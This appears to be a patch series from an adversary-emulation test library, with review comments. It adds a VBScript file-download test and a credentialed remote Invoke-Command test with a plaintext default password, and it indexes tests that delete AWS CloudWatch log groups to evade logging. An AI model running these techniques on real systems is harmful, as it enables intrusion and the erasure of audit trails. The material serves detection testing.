#{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" cleanup_command: name: sh elevation_required: false \ No newline at end of file From 4ab943e73b937bace568227a3faacf16d386be65 Mon Sep 17 00:00:00 2001 From: Panos Moullotos <25383165+moullos@users.noreply.github.com> Date: Mon, 1 Aug 2022 19:51:46 +0300 Subject: [PATCH 16/22] New T1105 test based on open issue (#2060) * Create T1105-download-file.vbs * Added 2 tests to T1105 based on open issue * Update T1105.yaml * remove duplicate Co-authored-by: Carrie Roberts --- atomics/T1105/T1105.yaml | 15 ++++++++++++++- atomics/T1105/src/T1105-download-file.vbs | 10 ++++++++++ 2 files changed, 24 insertions(+), 1 deletion(-) create mode 100644 atomics/T1105/src/T1105-download-file.vbs 
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index b49dd3c9..5a7f3390 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -700,4 +700,17 @@ atomic_tests: command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}' cleanup_command: 'del #{local_path} >nul 2>&1' name: command_prompt - + +- name: Download a file using wscript + description: Use wscript to run a local VisualBasic file to download a remote file + supported_platforms: + - windows + input_arguments: + vbscript_file: + description: Full path to the VisualBasic downloading the file + type: String + default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs + executor: + command: 'wscript.exe #{vbscript_file}' + cleanup_command: del Atomic-License.txt >nul 2>&1 + name: command_prompt diff --git a/atomics/T1105/src/T1105-download-file.vbs b/atomics/T1105/src/T1105-download-file.vbs new file mode 100644 index 00000000..2720a6e9 --- /dev/null +++ b/atomics/T1105/src/T1105-download-file.vbs @@ -0,0 +1,10 @@ +Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1") +URL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" +objWinHttp.open "GET", URL, False +objWinHttp.send "" +Dim BinaryStream +Set BinaryStream = CreateObject("ADODB.Stream") +BinaryStream.Type = 1 +BinaryStream.Open +BinaryStream.Write objWinHttp.responseBody +BinaryStream.SaveToFile "Atomic-License.txt", 2 From e3b3dc6c036be6db7cd829cc9a331e8d921dc8b2 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 1 Aug 2022 16:52:17 +0000 Subject: [PATCH 17/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1105/T1105.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 5a7f3390..09356531 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml 
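Review bot: The cleanup `del Atomic-License.txt >nul 2>&1` assumes the executor and the cleanup share a working directory, because the .vbs writes the file relative to its CWD; either pass an explicit output path (`wscript.exe #{vbscript_file} #{output_file}` with the script reading `WScript.Arguments(0)`) or state in the description that the artifact lands in the current directory. The `vbscript_file` default `PathToAtomicsFolder\T1105\src\T1105-download-file.vbs` carries no `$`, which works only if the runner substitutes the bare token for command_prompt tests — nothing in this hunk shows that convention, so confirm it resolves. The description could also name what is downloaded (the repository LICENSE) so a reviewer of run logs knows the expected artifact.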
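Review bot: `objWinHttp.send ""` is followed directly by `BinaryStream.Write objWinHttp.responseBody` with no check of `objWinHttp.Status`, so a 404 or proxy error page is silently saved as `Atomic-License.txt` and the test still exits 0; add `If objWinHttp.Status <> 200 Then WScript.Quit 1` after the send so the executor's exit code reflects the failure. A GET needs no body, so `objWinHttp.send` without the empty-string argument is the cleaner form. A one-line header comment such as `' Downloads the repository LICENSE into the current directory as a benign T1105 artifact` would help anyone triaging this file when it appears in an alert.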
@@ -702,6 +702,7 @@ atomic_tests: name: command_prompt - name: Download a file using wscript + auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188 description: Use wscript to run a local VisualBasic file to download a remote file supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 1235e5f5..03b61cda 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1100,3 +1100,4 @@ a27418de-bdce-4ebd-b655-38f11142bf0c 33eacead-f117-4863-8eb0-5c6304fbfaa9 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 57ba4ce9-ee7a-4f27-9928-3c70c489b59d +97116a3f-efac-4b26-8336-b9cb18c45188 From 4e0637e706f4b2b3cc9d9903704341edc8e54103 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 1 Aug 2022 16:52:24 +0000 Subject: [PATCH 18/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 15 +++++++ atomics/T1105/T1105.md | 39 +++++++++++++++++++ 6 files changed, 58 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 0f140af2..52083a51 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -1253,6 +1253,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt +command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 9748317b..199d8831 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -909,6 +909,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt +command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 9c728cb9..06331add 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -2095,6 +2095,7 @@ - Atomic Test #23: Lolbas replace.exe use to copy file [windows] - Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows] - Atomic Test #25: certreq download [windows] + - Atomic Test #26: Download a file using wscript [windows] - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 79c3f983..f29c6a37 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1521,6 +1521,7 @@ - Atomic Test #23: Lolbas replace.exe use to copy file [windows] - Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows] - Atomic Test #25: certreq download [windows] + - Atomic Test #26: Download a file using wscript [windows] - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a944ce29..520c8a9e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -91410,6 +91410,21 @@ command-and-control: command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}' cleanup_command: 'del #{local_path} >nul 2>&1' name: command_prompt + - name: Download a file using wscript + auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188 + description: Use wscript to run a local VisualBasic file to download a remote + file + supported_platforms: + - windows + input_arguments: + vbscript_file: + description: Full path to the VisualBasic downloading the file + type: String + default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs + executor: + command: 'wscript.exe #{vbscript_file}' + cleanup_command: del Atomic-License.txt >nul 2>&1 + name: command_prompt T1001.002: technique: x_mitre_platforms: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index ffac8680..74f3f203 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -58,6 +58,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co - [Atomic Test #25 - certreq download](#atomic-test-25---certreq-download) +- [Atomic Test #26 - Download a file using wscript](#atomic-test-26---download-a-file-using-wscript) +
@@ -1132,4 +1134,41 @@ del #{local_path} >nul 2>&1 +
+
+ +## Atomic Test #26 - Download a file using wscript +Use wscript to run a local VisualBasic file to download a remote file + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 97116a3f-efac-4b26-8336-b9cb18c45188 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vbscript_file | Full path to the VisualBasic downloading the file | String | PathToAtomicsFolder\T1105\src\T1105-download-file.vbs| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +wscript.exe #{vbscript_file} +``` + +#### Cleanup Commands: +```cmd +del Atomic-License.txt >nul 2>&1 +``` + + + + +
From a6edd37f05ab9a3e0313fdea438612faf4101db4 Mon Sep 17 00:00:00 2001 From: tenillekay <54289116+tenillekay@users.noreply.github.com> Date: Mon, 1 Aug 2022 16:13:53 -0500 Subject: [PATCH 19/22] Update T1021.006.yaml (#2063) Updated Test #2 to make it more complete. --- atomics/T1021.006/T1021.006.yaml | 31 +++++++++++++++++++------------ 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/atomics/T1021.006/T1021.006.yaml b/atomics/T1021.006/T1021.006.yaml index d19b621d..0a47fb86 100644 --- a/atomics/T1021.006/T1021.006.yaml +++ b/atomics/T1021.006/T1021.006.yaml 
@@ -14,27 +14,34 @@ atomic_tests: Enable-PSRemoting -Force name: powershell elevation_required: true -- name: Invoke-Command +- name: Remote Code Execution with PS Credentials Using Invoke-Command auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 description: | Execute Invoke-command on remote host. - Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. + Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`. supported_platforms: - windows input_arguments: - host_name: - description: Remote Windows Host Name - type: String - default: localhost - remote_command: - description: Command to execute on remote Host - type: String - default: ipconfig + username: + description: The username running the powershell command + type: string + default: $env:USERNAME + remotehost: + description: The remote hostname of the machine you are running the powershell command on. + type: string + default: $env:COMPUTERNAME + password: + description: The password to be used with the user provided in the previous input argument. + type: string + default: test12345 executor: - command: | - invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} + command: |- + $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force + $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword) + Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami} name: powershell + - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled From 423d25021b37644cf722fd6e68d1cb78226acbce Mon Sep 17 00:00:00 2001 
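Review bot: With the new defaults the test cannot authenticate: `password` defaults to `test12345` while `username` defaults to `$env:USERNAME`, so `Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred` presents the current user with a password that is almost certainly wrong, whereas the replaced version ran against localhost without a credential and worked out of the box. Either say in `description` that `password` (and normally `username`) must be supplied, or add a `dependencies` entry whose `prereq_command` verifies the credential before the executor runs. `type: string` on the three inputs is lowercase while the removed inputs and the rest of the file use `String`; the generator tolerates it, but the schema is now inconsistent. The plaintext password is substituted into the script text, so it will appear in PowerShell script-block logs (event 4104) on the source host — worth a sentence for anyone later triaging those logs. The stray blank `+` line before `- name: WinRM Access with Evil-WinRM` is whitespace only.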
From: Atomic Red Team doc generator Date: Mon, 1 Aug 2022 21:14:26 +0000 Subject: [PATCH 20/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/Indexes-Markdown/index.md | 2 +- .../Indexes/Indexes-Markdown/windows-index.md | 2 +- atomics/Indexes/index.yaml | 33 +++++++++++-------- atomics/T1021.006/T1021.006.md | 15 +++++---- 6 files changed, 33 insertions(+), 23 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 52083a51..e3e0891f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -844,7 +844,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell -lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell +lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt 
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 199d8831..f024778f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -604,7 +604,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell -lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell +lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 06331add..e155fc0a 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -1465,7 +1465,7 @@ - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md) - Atomic Test #1: Enable Windows Remote Management [windows] - - Atomic Test #2: Invoke-Command [windows] + - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows] - Atomic Test #3: WinRM Access with Evil-WinRM [windows] - [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md) - Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index f29c6a37..a2bcf3fa 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1060,7 +1060,7 @@ - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md) - Atomic Test #1: Enable Windows Remote Management [windows] - - Atomic Test #2: Invoke-Command [windows] + - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows] - Atomic Test #3: WinRM Access with Evil-WinRM [windows] - [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md) - Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 520c8a9e..7f161f78 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -67595,27 +67595,34 @@ lateral-movement: ' name: powershell elevation_required: true - - name: Invoke-Command + - name: Remote Code Execution with PS Credentials Using Invoke-Command auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 description: | Execute Invoke-command on remote host. - Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. + Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`. supported_platforms: - windows input_arguments: - host_name: - description: Remote Windows Host Name - type: String - default: localhost - remote_command: - description: Command to execute on remote Host - type: String - default: ipconfig + username: + description: The username running the powershell command + type: string + default: "$env:USERNAME" + remotehost: + description: The remote hostname of the machine you are running the powershell + command on. + type: string + default: "$env:COMPUTERNAME" + password: + description: The password to be used with the user provided in the previous + input argument. + type: string + default: test12345 executor: - command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} - - ' + command: |- + $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force + $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword) + Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami} name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md index 5e070e13..2ec818bd 100644 --- a/atomics/T1021.006/T1021.006.md +++ b/atomics/T1021.006/T1021.006.md 
@@ -8,7 +8,7 @@ WinRM is the name of both a Windows service and a protocol that allows a user to - [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management) -- [Atomic Test #2 - Invoke-Command](#atomic-test-2---invoke-command) +- [Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2---remote-code-execution-with-ps-credentials-using-invoke-command) - [Atomic Test #3 - WinRM Access with Evil-WinRM](#atomic-test-3---winrm-access-with-evil-winrm) @@ -45,10 +45,10 @@ Enable-PSRemoting -Force

-## Atomic Test #2 - Invoke-Command +## Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command Execute Invoke-command on remote host. -Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. +Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`. **Supported Platforms:** Windows @@ -62,15 +62,18 @@ Upon successful execution, powershell will execute ipconfig on localhost using ` #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| host_name | Remote Windows Host Name | String | localhost| -| remote_command | Command to execute on remote Host | String | ipconfig| +| username | The username running the powershell command | string | $env:USERNAME| +| remotehost | The remote hostname of the machine you are running the powershell command on. | string | $env:COMPUTERNAME| +| password | The password to be used with the user provided in the previous input argument. | string | test12345| #### Attack Commands: Run with `powershell`! ```powershell -invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} +$SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword) +Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami} ``` From 93133c0fc5378dc9aaf700779efccaeafee6d586 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 1 Aug 2022 21:38:34 +0000 Subject: [PATCH 21/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/used_guids.txt | 2 ++ 1 file changed, 2 insertions(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 03b61cda..98748362 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt 
@@ -1101,3 +1101,5 @@ a27418de-bdce-4ebd-b655-38f11142bf0c 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 57ba4ce9-ee7a-4f27-9928-3c70c489b59d 97116a3f-efac-4b26-8336-b9cb18c45188 +89422c87-b57b-4a04-a8ca-802bb9d06121 +33ca84bc-4259-4943-bd36-4655dc420932 From 75d1f18790bf59d84639ba29c7b523022a6d2dab Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 1 Aug 2022 21:38:41 +0000 Subject: [PATCH 22/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/linux-index.md | 2 + atomics/Indexes/index.yaml | 82 +++++++++++++ atomics/T1562.008/T1562.008.md | 109 ++++++++++++++++++ 6 files changed, 199 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e3e0891f..aa9702c5 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -359,6 +359,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2 defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh +defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh +defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index d2f57b64..d2195c8f 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -77,6 +77,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2 defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh +defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh +defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index e155fc0a..c5e4ac8c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -527,6 +527,8 @@ - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure] - Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365] - Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos] + - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws] + - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws] - [T1564.003 Hidden Window](../../T1564.003/T1564.003.md) - Atomic Test #1: Hidden Window [windows] - T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 062a8e2b..6da30745 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -162,6 +162,8 @@ - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure] - Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365] - Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos] + - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws] + - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws] - T1564.003 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7f161f78..122b1e3f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -21526,6 +21526,88 @@ defense-evasion: ./stratus cleanup --all name: sh elevation_required: false + - name: AWS CloudWatch Log Group Deletes + auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121 + description: "Creates a new cloudWatch log group in AWS, Upon successful creation + it will Delete the group. Attackers can use this technique to evade defenses + by \ndeleting the log stream. Once it is deleted, the logs created by the + attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion\n" + supported_platforms: + - iaas:aws + input_arguments: + cloudwatch_log_group_name: + description: Name of the cloudWatch log group + type: String + default: log-test + region: + description: Name of the region + type: String + default: us-east-1 + dependencies: + - description: 'Check if ~/.aws/credentials file has a default stanza is configured + + ' + prereq_command: 'cat ~/.aws/credentials | grep "default" + + ' + get_prereq_command: 'echo Please install the aws-cli and configure your AWS + defult profile using: aws configure + + ' + executor: + command: | + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region 